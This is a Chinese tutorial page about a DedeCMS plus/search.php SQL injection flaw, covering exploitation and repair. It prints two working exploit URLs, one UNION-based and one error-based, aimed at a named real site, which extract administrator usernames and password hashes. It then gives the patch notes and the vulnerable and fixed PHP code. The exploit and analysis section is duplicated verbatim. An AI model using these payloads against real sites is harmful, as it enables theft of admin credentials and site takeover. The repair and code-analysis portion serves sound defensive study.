您现在的位置是:首页 > 教程 > dedecms教程dedecms教程
dedecms的plus/search.php注入漏洞修复教程和利用方法
曼易2023-12-05 18:39:29dedecms教程已有人查阅
导读dedecms的最近出的一高危漏洞,search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单.
dedecms的最近出的一高危漏洞,search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单.
下面是漏洞的详细利用细节:
0×1:
http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[ uNion ]=a
报错如果为:Safe Alert: Request Error step 2 !
则利用以下exp:http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0×2:
http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[ uNion ]=a
报错如果为:Safe Alert: Request Error step 1 !
则利用以下exp:http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
漏洞修复:
20130115常规安全更新
include/arc.searchview.class.php, 搜索功能准确度优化
member/myfriend_group.php, 修复会员中心会员分组功能存在的安全隐患
plus/search.php, 修复搜索功能存在的安全隐患
登录DEDECMS后台会有提示,更新即可。不过貌似官方没有提供安全更新补丁的下载地址,找了半天没找到~
漏洞分析:存在漏洞的文件/plus/search.php
下面是漏洞的详细利用细节:
0×1:
http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[ uNion ]=a
报错如果为:Safe Alert: Request Error step 2 !
则利用以下exp:http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0×2:
http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[ uNion ]=a
报错如果为:Safe Alert: Request Error step 1 !
则利用以下exp:http://www.ebingou.cn/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
漏洞修复:
20130115常规安全更新
include/arc.searchview.class.php, 搜索功能准确度优化
member/myfriend_group.php, 修复会员中心会员分组功能存在的安全隐患
plus/search.php, 修复搜索功能存在的安全隐患
登录DEDECMS后台会有提示,更新即可。不过貌似官方没有提供安全更新补丁的下载地址,找了半天没找到~
漏洞分析:存在漏洞的文件/plus/search.php
//引入栏目缓存并看关键字是否有相关栏目内容
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
{
foreach($typeArr as $id=>$typename)
{
$keywordn = str_replace($typename, ‘ ‘, $keyword);
if($keyword != $keywordn)
{
$keyword = $keywordn;
$typeid = $id; //对ID没做任何过滤 导致注入
break;
}
}
}
}
$keyword = addslashes(cn_substr($keyword,30));
修复之后
//引入栏目缓存并看关键字是否有相关栏目内容
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
{
foreach($typeArr as $id=>$typename)
{
//$keywordn = str_replace($typename, ‘ ‘, $keyword);
$keywordn = $keyword;
if($keyword != $keywordn)
{
$keyword = HtmlReplace($keywordn);//防XSS
$typeid = intval($id); //强制转换为数字型
break;
}
}
}
}
$keyword = addslashes(cn_substr($keyword,30));
本文标签:
很赞哦! ()
相关文章
- dedecms织梦错误(PHP 5.3 and above) Please set 'request_order'
- dedecms文章列表页添加缩略图的实现方法
- dedecms织梦如何调用Discuz论坛主题等数据
- dedecms织梦限制栏目列表生成的最大页数的方法
- 织梦dedecms添加RSS订阅功能的代码实例
- dedecms织梦在首页或列表页调用整篇文章内容的方法
- 织梦dedecms系统的安装方法步骤教程
- 织梦dedecms给栏目加一个英文栏目名字段的实现方法
- dedecms织梦验证码的代码注释介绍
- 织梦dedecms如何让文章列表实现隔行换色的代码实例
- dedecms织梦tag彩色关键字彩色标签修改方法
- dedecms织梦网页调用指定栏目信息的实现方法
随机图文
-
织梦dedecms列表有缩图显示无缩图则不显示缩图的方法
在list_article.htm模板页里,有文章列表没有图片,但是前面会显示“无缩略图”,就是当没有图片的时候,怎么样去掉这个“无缩略图”的原始默认缩图, -
织梦dedecms怎么去掉栏目页面包屑导航的分隔符>
在栏目页里调用的面包屑导航,之后会出现分割符号“>”,如:主页 > DedeCMS 模板 >用下面这两种方法可以将之后的分割符“>”,用如下代码调用面包屑导航标签: -
织梦dedecms全站RSS输出的方法示例
首先,你新建一个rss.php文件,把下面的代码拷贝到其中:保存该文件到站点根目录下。然后,再制作一个rss.htm模板输出文件,把下面的代码拷贝到其中: -
dedecms搜索时出现SphinxClient类找不到怎么办
Sphinx是一个基于SQL的全文检索引擎,可以结合MySQL,PostgreSQL做全文搜索,它可以提供比数据库本身更专业的搜索功能
留言与评论 (共有 条评论) |